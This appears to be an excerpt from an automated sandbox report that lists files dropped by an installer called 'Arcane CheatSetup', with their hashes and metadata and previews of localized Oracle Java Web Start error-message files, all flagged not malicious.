                                Preview:#..# Copyright (c) 2004, 2016, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#....error.internal.badmsg=erro interno, mensagem desconhecida..error.badinst.nojre=Instala\u00E7\u00E3o incorreta. Nenhum JRE encontrado no arquivo de configura\u00E7\u00E3o..error.launch.execv=Erro encontrado ao chamar Java Web Start (execv)..error.launch.sysexec=Erro encontrado ao chamar Java Web Start (SysExec) ..error.listener.failed=Tela Inicial: falha em sysCreateListenerSocket..error.accept.failed=Tela Inicial: falha na fun\u00E7\u00E3o accept..error.recv.failed=Tela Inicial: falha na fun\u00E7\u00E3o recv..error.invalid.port=Tela Inicial: n\u00E3o reativou uma porta v\u00E1lida..error.read=Ler ap\u00F3s o final do buffer..error.xmlparsing=Erro durante o parsing de XML: tipo incorreto de token encontrado..error.splash.exit=Saindo do processamento da tela inicial do Java Web .....\n..# "Last WinSock Error" means the error message
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with very long lines (1475), with CRLF line terminators
                                Category:dropped
                                Size (bytes):3632
                                Entropy (8bit):4.776451902180833
                                Encrypted:false
                                SSDEEP:96:KHelXJn5woLUosi30hrleaRSfvlBY0CQ1Z:KHelNTAxFtlE/71Z
                                MD5:72BDAE07C5D619E5849A97ACC6A1090F
                                SHA1:9FC8A7A29658AC23A30AB9D655117BB79D08DC3B
                                SHA-256:821A3452ECB9F29BCEC16C0B39FB668C2CC30C7F7283B34BFC5400040723892B
                                SHA-512:67F0D1D60012B5598864B68612AA488AF1B5876FF5F347CD98ABCF1E3C0D267CF0354D5085BF12B0A09C6EF124FD0117CD16FCC032DA2B195D45BAB19740BB78
                                Malicious:false
                                Preview:#..# Copyright (c) 2004, 2013, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#....error.internal.badmsg=Error interno, mensaje desconocido..error.badinst.nojre=Instalaci\u00F3n incorrecta. No se ha encontrado JRE en el archivo de configuraci\u00F3n..error.launch.execv=Se ha encontrado un error al llamar a Java Web Start (execv)..error.launch.sysexec=Se ha encontrado un error al llamar a Java Web Start (SysExec) ..error.listener.failed=Pantalla de Presentaci\u00F3n: fallo de sysCreateListenerSocket..error.accept.failed=Pantalla de Presentaci\u00F3n: fallo de accept..error.recv.failed=Pantalla de Presentaci\u00F3n: fallo de recv..error.invalid.port=Pantalla de Presentaci\u00F3n: no se ha activado un puerto v\u00E1lido..error.read=Lectura m\u00E1s all\u00E1 del final del buffer..error.xmlparsing=Error de an\u00E1lisis de XML: se ha encontrado un tipo de token no v\u00E1lido..error.splash.exit=Saliendo del proceso d
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):2917
                                Entropy (8bit):4.838706790124659
                                Encrypted:false
                                SSDEEP:48:KaDMJ9TmsHDmDDCDP2un8YzgKe1E13Tstub22tTeF/Qi/WRtAXikTzgaENZzT3JI:KaD+9TmAe29vBotubbt2Oz+ENlbJI
                                MD5:2EB9117D147BAA0578E4000DA9B29E12
                                SHA1:3D297ECF3D280D4AA3D1423E885994495243F326
                                SHA-256:B8D9C69FF7F4832A9B365D4A43CF66DFF9847051752B13EEDF024CAA9C1EF46B
                                SHA-512:C3F7730767941B3C8F6F53D4686E9F898D1907D978F6D1FA35BA02C3FCD8306335406A5F9ABAA844F27F7AFD9E548810BECB9EC3E6B84888EA5EAC57B6ED6FDB
                                Malicious:false
                                Preview:#..# Copyright (c) 2004, 2011, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#....error.internal.badmsg=internal error, unknown message..error.badinst.nojre=Bad installation. No JRE found in configuration file..error.launch.execv=Error encountered while invoking Java Web Start (execv)..error.launch.sysexec=Error encountered while invoking Java Web Start (SysExec) ..error.listener.failed=Splash: sysCreateListenerSocket failed..error.accept.failed=Splash: accept failed..error.recv.failed=Splash: recv failed..error.invalid.port=Splash: didn't revive a valid port..error.read=Read past end of buffer..error.xmlparsing=XML Parsing error: wrong kind of token found..error.splash.exit=Java Web Start splash screen process exiting .....\n..# "Last WinSock Error" means the error message for the last operation that failed...error.winsock=\tLast WinSock Error: ..error.winsock.load=Couldn't load winsock.dll..error.winsock.start
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with very long lines (1575), with CRLF line terminators
                                Category:dropped
                                Size (bytes):3441
                                Entropy (8bit):4.832330268062187
                                Encrypted:false
                                SSDEEP:48:KE2CXpRLJDNXQC6tNaEGBlu9hUv5//zEvDiwkISAyHgKe1p6KF/uoYuh1LNRtS0f:KERXlp6tN1VHq1Kt1S4x8Xi
                                MD5:FFE3CC16616314296C3262B0A0E093CD
                                SHA1:198DD1C6E6707C10AE74A1C42E8A91C429598F3B
                                SHA-256:3941736BEF6A8E53D002B6B67ECE4793C2F3F34BCC1ECB271684EB3F73FC4103
                                SHA-512:CD3A9329F405CA14E11CDBB74D467B31A31530CBF00537B16FB23AEBC6C07EB268E9624FDBC997AA0CF4852DAC288E1D011E2FC392D71E25DBDF52E359BA9D4E
                                Malicious:false
                                Preview:#..# Copyright (c) 2004, 2011, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#....error.internal.badmsg=erreur interne, message inconnu..error.badinst.nojre=Installation incorrecte. JRE introuvable dans le fichier de configuration..error.launch.execv=Erreur lors de l'appel de Java Web Start (execv)..error.launch.sysexec=Erreur lors de l'appel de Java Web Start (SysExec) ..error.listener.failed=Accueil : \u00E9chec de sysCreateListenerSocket..error.accept.failed=Accueil : \u00E9chec d'accept..error.recv.failed=Accueil : \u00E9chec de recv..error.invalid.port=Accueil : impossible de r\u00E9activer un port valide..error.read=Lecture apr\u00E8s la fin de tampon..error.xmlparsing=Erreur d'analyse XML : type incorrect de jeton..error.splash.exit=Le processus d'affichage de l'\u00E9cran d'accueil de Java Web Start est en cours de fermeture...\n..# "Last WinSock Error" means the error message for the last operation that
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with very long lines (1392), with CRLF line terminators
                                Category:dropped
                                Size (bytes):3255
                                Entropy (8bit):4.7050139579578145
                                Encrypted:false
                                SSDEEP:48:KTi+qOaVUVVMsD/B0FN5+eADELDHxhdpHgKe1uo265eLaqMQ6URhmwgFs+ur60:KJBa2VtzeDLDRhd5A26+7RhZgR0
                                MD5:BF5E5310B2DCF8E8B3697B358AD4446D
                                SHA1:C746AC1F46F607FA8F971BEA2B6853746A4FB28D
                                SHA-256:CC9AD73957535011EE2376C23DE2C2597F877ACEBA9173E822EE79AAD3C4E9E6
                                SHA-512:B6C61D38B0ACC427B9B2F4C19DABD7EACBE8EEA6B973FD31B3555C4C5B3FFAF1CA036B730359346F57223B44CCE79E04A6D06BBC13C6F7DD26ED463776BB6DCC
                                Malicious:false
                                Preview:#..# Copyright (c) 2004, 2011, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#....error.internal.badmsg=errore interno, messaggio sconosciuto..error.badinst.nojre=Installazione errata. Impossibile trovare il JRE nel file di configurazione..error.launch.execv=Errore durante la chiamata di Java Web Start (execv)..error.launch.sysexec=Errore durante la chiamata di Java Web Start (SysExec) ..error.listener.failed=Apertura: sysCreateListenerSocket non riuscito..error.accept.failed=Apertura: accept non riuscito..error.recv.failed=Apertura: recv non riuscito..error.invalid.port=Apertura: impossibile identificare una porta valida..error.read=Tentativo di lettura dopo la fine del buffer..error.xmlparsing=Errore durante l'analisi XML: trovato un tipo di token errato..error.splash.exit=Uscita dal processo di schermata iniziale di Java Web Start in corso...\n..# "Last WinSock Error" means the error message for the last oper
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with very long lines (2924), with CRLF line terminators
                                Category:dropped
                                Size (bytes):6381
                                Entropy (8bit):4.5983590678211135
                                Encrypted:false
                                SSDEEP:96:Mu7cepcgD8do+O2D+k8/RJFGQcHGqo72hzEflA44CAmIbIC3j5pN/o8woJe:PctgYqhTYzG2O
                                MD5:D830FC76BDD1975010ECE4C5369DADF8
                                SHA1:D8CC3F54325142EFA740026E2BC623AFE6F3ACB5
                                SHA-256:11E886336BA51A9044AB1A87C60CEEE34C29BB724E06A16968D31531A7001064
                                SHA-512:7B867A50A811FBD7FFDAD0B729CA4501E16386EE5C4940A4CF9A805767CC0D10F7E3BDFD6A60204D79292D778D93E3BD915368AC0E9453BBB1010ADFD9655F0F
                                Malicious:false
                                Preview:#..# Copyright (c) 2004, 2013, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#....error.internal.badmsg=\u5185\u90E8\u30A8\u30E9\u30FC\u3001\u4E0D\u660E\u306A\u30E1\u30C3\u30BB\u30FC\u30B8..error.badinst.nojre=\u30A4\u30F3\u30B9\u30C8\u30FC\u30EB\u304C\u6B63\u3057\u304F\u3042\u308A\u307E\u305B\u3093\u3002\u69CB\u6210\u30D5\u30A1\u30A4\u30EB\u5185\u306BJRE\u304C\u3042\u308A\u307E\u305B\u3093..error.launch.execv=Java Web Start\u306E\u547C\u51FA\u3057\u4E2D\u306B\u30A8\u30E9\u30FC\u304C\u767A\u751F\u3057\u307E\u3057\u305F(execv)..error.launch.sysexec=Java Web Start\u306E\u547C\u51FA\u3057\u4E2D\u306B\u30A8\u30E9\u30FC\u304C\u767A\u751F\u3057\u307E\u3057\u305F(SysExec) ..error.listener.failed=\u30B9\u30D7\u30E9\u30C3\u30B7\u30E5: sysCreateListenerSocket\u306B\u5931\u6557\u3057\u307E\u3057\u305F..error.accept.failed=\u30B9\u30D7\u30E9\u30C3\u30B7\u30E5: accept\u306B\u5931\u6557\u3057\u307E\u3057\u305F..error.recv.fai
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with very long lines (2601), with CRLF line terminators
                                Category:dropped
                                Size (bytes):5744
                                Entropy (8bit):4.781504394194986
                                Encrypted:false
                                SSDEEP:96:GhymCk3kjLqgz9RkfrsEW/p9M32i0HkZr+ywc8b8+/moD7yct070DL70Dm:Dm5kLfIErMbT/44in
                                MD5:64DE22212EE92F29BCA3ACED72737254
                                SHA1:C4DBC247043578CCF9CD8DAB652D096703D5B26E
                                SHA-256:292696C94D5FD0BF2FF4AF9E4D363BFCBE888D2E65BD18A20CF71081FB1C9B0D
                                SHA-512:CA33C75B66D8B5316B1C3ED41A9A14DD8611A3BB9B26EFDC7F468250696D515CF1E966831975C9ABDC33E9A1C59167FE79BA547592D2A04997E1342433E7B628
                                Malicious:false
                                Preview:#..# Copyright (c) 2004, 2016, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#....error.internal.badmsg=\uB0B4\uBD80 \uC624\uB958\uAC00 \uBC1C\uC0DD\uD588\uC2B5\uB2C8\uB2E4. \uC54C \uC218 \uC5C6\uB294 \uBA54\uC2DC\uC9C0\uC785\uB2C8\uB2E4...error.badinst.nojre=\uC124\uCE58\uAC00 \uC798\uBABB\uB418\uC5C8\uC2B5\uB2C8\uB2E4. \uAD6C\uC131 \uD30C\uC77C\uC5D0\uC11C JRE\uB97C \uCC3E\uC744 \uC218 \uC5C6\uC2B5\uB2C8\uB2E4...error.launch.execv=Java Web Start(execv)\uB97C \uD638\uCD9C\uD558\uB294 \uC911 \uC624\uB958\uAC00 \uBC1C\uC0DD\uD588\uC2B5\uB2C8\uB2E4...error.launch.sysexec=Java Web Start(SysExec)\uB97C \uD638\uCD9C\uD558\uB294 \uC911 \uC624\uB958\uAC00 \uBC1C\uC0DD\uD588\uC2B5\uB2C8\uB2E4. ..error.listener.failed=\uC2A4\uD50C\uB798\uC2DC: sysCreateListenerSocket\uC744 \uC2E4\uD328\uD588\uC2B5\uB2C8\uB2E4...error.accept.failed=\uC2A4\uD50C\uB798\uC2DC: \uC2B9\uC778\uC744 \uC2E4\uD328\uD588\uC2B5\uB2C8\uB2E4...error.r
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with very long lines (1386), with CRLF line terminators
                                Category:dropped
                                Size (bytes):3441
                                Entropy (8bit):4.927824210480987
                                Encrypted:false
                                SSDEEP:96:KYD1QNsQZ/lmo8ZuLgdBGpv3JRJ/7coh91XlK7Q/vm2QAfO:9D1+sCmapce1KGm2QIO
                                MD5:81BBDEA4DC9803A6EB78CE7D5CA018ED
                                SHA1:9AAF012276AD89CE7273CF5F0BE4C95B72D906AB
                                SHA-256:565B8FF1F31784378884D9D7468FFDFDDA5B001ACB5BB393A5006AC19BE4E67A
                                SHA-512:310017DD27C91C492188737494DA04CAB241D0BF4E91326AFB4A3F98CBFF78A6C0BBC14EC7E883597E9D506FAA80BA4E9A25B5F46BFD2543850323061E829A84
                                Malicious:false
                                Preview:#..# Copyright (c) 2004, 2011, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#....error.internal.badmsg=internt fel, ok\u00E4nt meddelande..error.badinst.nojre=Felaktig installation. Ingen JRE har hittats i konfigurationsfilen..error.launch.execv=Ett fel intr\u00E4ffade under starten av Java Web Start (execv)..error.launch.sysexec=Ett fel intr\u00E4ffade under starten av Java Web Start (SysExec) ..error.listener.failed=V\u00E4lkomstsk\u00E4rm: sysCreateListenerSocket utf\u00F6rdes inte..error.accept.failed=V\u00E4lkomstsk\u00E4rm: kunde inte accepteras..error.recv.failed=V\u00E4lkomstsk\u00E4rm: kunde inte mottaga..error.invalid.port=V\u00E4lkomstsk\u00E4rm: \u00E5terskapade inte en giltig port..error.read=L\u00E4ste f\u00F6rbi slutet av bufferten..error.xmlparsing=XML-tolkningsfel: fel typ av igenk\u00E4nningstecken hittades..error.splash.exit=Java Web Start - v\u00E4lkomstsk\u00E4rmen avslutas .....\n..# "Last
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with very long lines (1857), with CRLF line terminators
                                Category:dropped
                                Size (bytes):4104
                                Entropy (8bit):5.04197285715923
                                Encrypted:false
                                SSDEEP:96:Me7R8zl0Zf4z3X4Gv2hEpeStEKADydYL1WfK0eSm91j7:1R8pOfWHJvOJT1WPtK1j7
                                MD5:823D1F655440C3912DD1F965A23363FC
                                SHA1:50B941A38B9C5F565F893E1E0824F7619F51185C
                                SHA-256:86663DED105B77261C0556468A93BC8666A094B918299A61AF0A8E30F42019C7
                                SHA-512:1EBF989D2121CF05FFC912B9B228C4D4523763EB1A689EC74568D811C88DCF11032FFC8007BB24DAF7D079B580662B77D94B4B8D71A2E891EF27979FF32CD727
                                Malicious:false
                                Preview:#..# Copyright (c) 2004, 2013, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#....error.internal.badmsg=\u5185\u90E8\u9519\u8BEF, \u672A\u77E5\u6D88\u606F..error.badinst.nojre=\u9519\u8BEF\u5B89\u88C5\u3002\u914D\u7F6E\u6587\u4EF6\u4E2D\u627E\u4E0D\u5230 JRE..error.launch.execv=\u8C03\u7528 Java Web Start (execv) \u65F6\u9047\u5230\u9519\u8BEF..error.launch.sysexec=\u8C03\u7528 Java Web Start (SysExec) \u65F6\u9047\u5230\u9519\u8BEF..error.listener.failed=\u542F\u52A8\u5C4F\u5E55: sysCreateListenerSocket \u5931\u8D25..error.accept.failed=\u542F\u52A8\u5C4F\u5E55: \u63A5\u53D7\u5931\u8D25..error.recv.failed=\u542F\u52A8\u5C4F\u5E55: recv \u5931\u8D25..error.invalid.port=\u542F\u52A8\u5C4F\u5E55: \u672A\u6062\u590D\u6709\u6548\u7AEF\u53E3..error.read=\u8BFB\u53D6\u8D85\u51FA\u7F13\u51B2\u533A\u7ED3\u5C3E..error.xmlparsing=XML \u89E3\u6790\u9519\u8BEF: \u53D1\u73B0\u9519\u8BEF\u7684\u6807\u8BB0\u7C7B\u578B..error.s
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with very long lines (1729), with CRLF line terminators
                                Category:dropped
                                Size (bytes):3784
                                Entropy (8bit):5.17620120701776
                                Encrypted:false
                                SSDEEP:96:wMWzQq8x9i7zO/JOFtUtQzy+gawZFomWdYQCfQ/ydQCyA:LWzQqms7S/JDtQcJoHWQaQ/6QCH
                                MD5:4287D97616F708E0A258BE0141504BEB
                                SHA1:5D2110CABBBC0F83A89AEC60A6B37F5F5AD3163E
                                SHA-256:479DC754BD7BFF2C9C35D2E308B138EEF2A1A94CF4F0FC6CCD529DF02C877DC7
                                SHA-512:F273F8D501C5D29422257733624B5193234635BD24B444874E38D8D823D728D935B176579D5D1203451C0CE377C57ED7EB3A9CE9ADCB3BB591024C3B7EE78DCD
                                Malicious:false
                                Preview:#..# Copyright (c) 2004, 2013, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#....error.internal.badmsg=\u5167\u90E8\u932F\u8AA4\uFF0C\u4E0D\u660E\u7684\u8A0A\u606F..error.badinst.nojre=\u5B89\u88DD\u932F\u8AA4\u3002\u5728\u7D44\u614B\u6A94\u4E2D\u627E\u4E0D\u5230 JRE..error.launch.execv=\u547C\u53EB Java Web Start (execv) \u6642\u9047\u5230\u932F\u8AA4..error.launch.sysexec=\u547C\u53EB Java Web Start (SysExec) \u6642\u9047\u5230\u932F\u8AA4..error.listener.failed=Splash: sysCreateListenerSocket \u5931\u6557..error.accept.failed=Splash: \u63A5\u53D7\u5931\u6557..error.recv.failed=Splash: recv \u5931\u6557..error.invalid.port=Splash: \u6709\u6548\u7684\u9023\u63A5\u57E0\u5C1A\u672A\u56DE\u5FA9..error.read=\u8B80\u53D6\u8D85\u51FA\u7DE9\u885D\u5340\u7D50\u5C3E..error.xmlparsing=XML \u5256\u6790\u932F\u8AA4: \u627E\u5230\u932F\u8AA4\u7684\u8A18\u865F\u7A2E\u985E..error.splash.exit=Java Web Start \u9583\u73FE\u87A2
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:GIF image data, version 89a, 320 x 139
                                Category:dropped
                                Size (bytes):8590
                                Entropy (8bit):7.910688771816331
                                Encrypted:false
                                SSDEEP:192:91m4OqvVyG+LMIcBc2qPjHmxJCCG/h97dIYhOX:9/OqdivcqzjH3tfDE
                                MD5:249053609EAF5B17DDD42149FC24C469
                                SHA1:20E7AEC75F6D036D504277542E507EB7DC24AAE8
                                SHA-256:113B01304EBBF3CC729A5CA3452DDA2093BD8B3DDC2BA29E5E1C1605661F90BE
                                SHA-512:9C04A20E2FA70E4BCFAC729E366A0802F6F5167EA49475C2157C8E2741C4E4B8452D14C75F67906359C12F1514F9FB7E9AF8E736392AC8434F0A5811F7DDE0CB
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:GIF image data, version 89a, 640 x 278
                                Category:dropped
                                Size (bytes):15276
                                Entropy (8bit):7.949850025334252
                                Encrypted:false
                                SSDEEP:192:onqkbSDLFgIBL0IgyZCE/oIuuemXclVO/HemZ8GbRdziHm6tIclW3ZYvvebtssZn:lKMLWkpgy8sdsnOmEyPLaYoauAdI
                                MD5:CB81FED291361D1DD745202659857B1B
                                SHA1:0AE4A5BDA2A6D628FAC51462390B503C99509FDC
                                SHA-256:9DD5CCD6BDFDAAD38F7D05A14661108E629FDD207FC7776268B566F7941E1435
                                SHA-512:4A383107AC2D642F4EB63EE7E7E85A8E2F63C67B41CA55EBAE56B52CECFE8A301AAF14E6536553CBC3651519DB5C10FC66588C84C9840D496F5AE980EF2ED2B9
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:GIF image data, version 89a, 320 x 139
                                Category:dropped
                                Size (bytes):7805
                                Entropy (8bit):7.877495465139721
                                Encrypted:false
                                SSDEEP:96:S88k2wenvMs3iHrSI3yy73VWOcaJpGvrrXqJBcqgbf5bD0jmzDBoqCN2IWsyh:SFHhs73n73V4airrXq41Ll3vBmN2YU
                                MD5:9E8F541E6CEBA93C12D272840CC555F8
                                SHA1:8DEF364E07F40142822DF84B5BB4F50846CB5E4E
                                SHA-256:C5578AC349105DE51C1E9109D22C7843AAB525C951E312700C73D5FD427281B9
                                SHA-512:2AB06CAE68DEC9D92B66288466F24CC25505AF954FA038748D6F294D1CFFB72FCC7C07BA8928001D6C487D1BF71FE0AF1B1AA0F35120E5F6B1B2C209BA596CE2
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:GIF image data, version 89a, 640 x 278
                                Category:dropped
                                Size (bytes):12250
                                Entropy (8bit):7.901446927123525
                                Encrypted:false
                                SSDEEP:192:Zzv4QPei/ueMFJ2M4xSGb/xGEyddpTa7Kv9I1BDc3KR3q6xmwJePYueHjAPZKGMr:5vTWvmxSGbkpTaYe1dc3KR3q7wJsOHmu
                                MD5:3FE2013854A5BDAA488A6D7208D5DDD3
                                SHA1:D2BFF9BBF7920CA743B81A0EE23B0719B4D057CA
                                SHA-256:FC39D09D187739E580E47569556DE0D19AF28B53DF5372C7E0538FD26EDB7988
                                SHA-512:E3048E8E0C22F6B200E5275477309083AA0435C0F33D1994C10CE65A52F357EE7CF7081F85C00876F438DFA1EE59B542D602287EC02EA340BFDF90C0C6ABD548
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):187736
                                Entropy (8bit):7.79606817499301
                                Encrypted:false
                                SSDEEP:3072:9Mxm+j7ZPrDuryFpqOv2xHamAIGiDZDo81qnI/vs7O04OvwFgBgvH6:ONduOJv29amxGiDtonI87aGBgva
                                MD5:13794986CA59819F6AF7BD70022D7F8F
                                SHA1:6C5609CD023EB001DC82F1E989D535CD7AD407EE
                                SHA-256:AF555DD438214DCD68D55EBDDCC0A05BF47DEF0EFD9920E3955D11CC2623628E
                                SHA-512:2E3C4E76FD911EFF5F6983D6D7FBB0F998E5FB0BFE11921A83AC9F19BFB0C28B157354F1AC790094C354845025AB42F5A921FDDF2A780497431F3912D7D3E518
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):187727
                                Entropy (8bit):7.7958934328326075
                                Encrypted:false
                                SSDEEP:3072:aMxm+j7ZPrDuryFpqOv2xHamAIGiDZDo81qnI/vs7O04OvwFgBPlHl:nNduOJv29amxGiDtonI87aGBPlF
                                MD5:82C16750374D5CCA5FDAA9434BAF8143
                                SHA1:9B49F07BFB6F4AE73EB9B2FADCAE46E02E31F023
                                SHA-256:1F0966EBD65544669395E9F490A3D397DCF122D5261566734BB422C68CFE64B8
                                SHA-512:12A32FBE2A0A824EC33BD6D0A22066C0CB74D13EEBC16622FFE420CD48B4EB5878C981384DEBE30285D6231B3224E5CD2380C22D8C18624E52E5C74B62221661
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):3860522
                                Entropy (8bit):7.9670916513081735
                                Encrypted:false
                                SSDEEP:98304:PI1SwP9utPgTIb0bxSxwF1nNZVdEILeH9IIyYNO4Inwz:PI1HYgkoxSxI9fs4UVIwz
                                MD5:AE86774D28F1C8270A9BCBD12A9A1865
                                SHA1:7806C70550F435C2C87D2D15E427E5A9F97774E4
                                SHA-256:0402FBCB23D381DEDE4DF4228F2D100D8693C5B3BAB885AB5EB98BCC0A269786
                                SHA-512:2EA1E0372A087915FFFCCA2DEFC817C37BD038B02824BFEC1DA4E881A4C908A93AEB37DAA38840F75BCEAFD02EC09088FE648B0305DA0407E93407EAC770BE63
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):8286
                                Entropy (8bit):7.790619326925194
                                Encrypted:false
                                SSDEEP:192:tX5jIgU7WbMCc0XmHTEIWB7EH+mqcEb+wYtvEmkbKdG:tXZU7WbMoWTFWBAH+BCrEmkh
                                MD5:7FA7F97FA1CC0CC8ACC37B9DAE4464AE
                                SHA1:C143646A6DBE2EBDB1FBF69C09793E7F07DBC1F5
                                SHA-256:36820223C5B9A225DC3FF7C1C3930BDB112F1D9AAB2BEE954FF1A1C1828E2C54
                                SHA-512:AD9A0E358BE7A765B4A554E6BBE35BDD61A52BCAC9F21915D84C2A1929780150DFDCF0E43121D0E844082B1BB92873ED848ACF9B38FF3C7D826E5D0F5D32C26C
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):1178848
                                Entropy (8bit):7.964832897711047
                                Encrypted:false
                                SSDEEP:12288:qLvFVMHxMyEg7+dYmx0nqEdgq2C942bjAHcOveMdDLtHHicwqJM5SznKMWKdk/H2:cF9rYmxQ5tOcOdFwqSYzn0DfYHs4jOBK
                                MD5:24857AD811CEDA70BD0F087FD28B5B6E
                                SHA1:707305EB10B1464D40BDEABADE77B80B984A621A
                                SHA-256:321D646AD29A5B180CA98BB49E81C2C732523B7E5145A3C568766CEC06B2B1CD
                                SHA-512:A10A340BDB2DE2D0D14ED804F04313D1D4CBD64EF0513A9E54B7FA95FFB05F2123C9095A4B2BFFA4DDF3ADEA9A67E978D26D115A8F5677AE1BD0EE67C416FA5A
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):44516
                                Entropy (8bit):7.905075370162141
                                Encrypted:false
                                SSDEEP:768:2YVL1eqfgKbWnXuZ/QvfBPJr+A6tkZQnWn109KqM9jE4z:2KL1eWgfnXuEfJQAdQnWn10kqg3z
                                MD5:1A33FF1FDD789E655D5E2E99E9E719BD
                                SHA1:AE88E6000EBD7F547E3C047FC81AE1F65016B819
                                SHA-256:A23A9A653A261C640703B42839137F8C4BF7650665E62DBDD7D538171BD72516
                                SHA-512:0451393D805414D6633824F3D18B609F7495324FAB56DF4330E874A8995BD9E0DA567D77DB682D7FD1544CD7E6A3D10745C23DB575035E391B02D6EE4C4362FD
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                Category:dropped
                                Size (bytes):279427
                                Entropy (8bit):7.90277234368113
                                Encrypted:false
                                SSDEEP:3072:E/Ieog0SgEOU8pqHbQpr16jWun5bT1aReAaTFMzpx2Xcpll+PrA3YaRBlLi:E/m9eJsppCLJTURe9TFMrQ0fkUK
                                MD5:B04074A9FC78DC1409168E1E2D139647
                                SHA1:54182C904A48364FC572E3A2631DF14823C29CEF
                                SHA-256:BFAD3FB11E7115AAF34719488551BF3205B2FAFFB38681C7F6BDAD19BB7568C2
                                SHA-512:E97CA3D53E867E957BF467688F83C53B2FD6FF1EA001B19F03A23096581DC8ADCEC7C1403D164D063B1A437E4BF6FA98E1543626849D4E17E31156CB012F9599
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):187736
                                Entropy (8bit):7.79606817499301
                                Encrypted:false
                                SSDEEP:3072:9Mxm+j7ZPrDuryFpqOv2xHamAIGiDZDo81qnI/vs7O04OvwFgBgvH6:ONduOJv29amxGiDtonI87aGBgva
                                MD5:13794986CA59819F6AF7BD70022D7F8F
                                SHA1:6C5609CD023EB001DC82F1E989D535CD7AD407EE
                                SHA-256:AF555DD438214DCD68D55EBDDCC0A05BF47DEF0EFD9920E3955D11CC2623628E
                                SHA-512:2E3C4E76FD911EFF5F6983D6D7FBB0F998E5FB0BFE11921A83AC9F19BFB0C28B157354F1AC790094C354845025AB42F5A921FDDF2A780497431F3912D7D3E518
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):68923
                                Entropy (8bit):7.950933538093809
                                Encrypted:false
                                SSDEEP:1536:YNSe2yN5DbD630l1MIeEfqjGWb2LU2j6rnbisZp/u:Ne2yNhDVl1leEP/qn2sZk
                                MD5:4D507E8D7BBF5ECEC8791CBA57B1CE17
                                SHA1:A66C0D4648A06B9078252D090D596C91C591AA50
                                SHA-256:C3993DF765AFF1068A656B28A7A4EDFFE7710AE3B6AA2EA056A6F9C3EDBDC210
                                SHA-512:21B4E729B16947B31657DC5F7F5C75DCDA9F94B4A0ED414E11A6D02951137AC266D605855DDDA7C21BE0200EA07530962D1ECE2FAE009EAE5F2A1A365195C995
                                Malicious:false
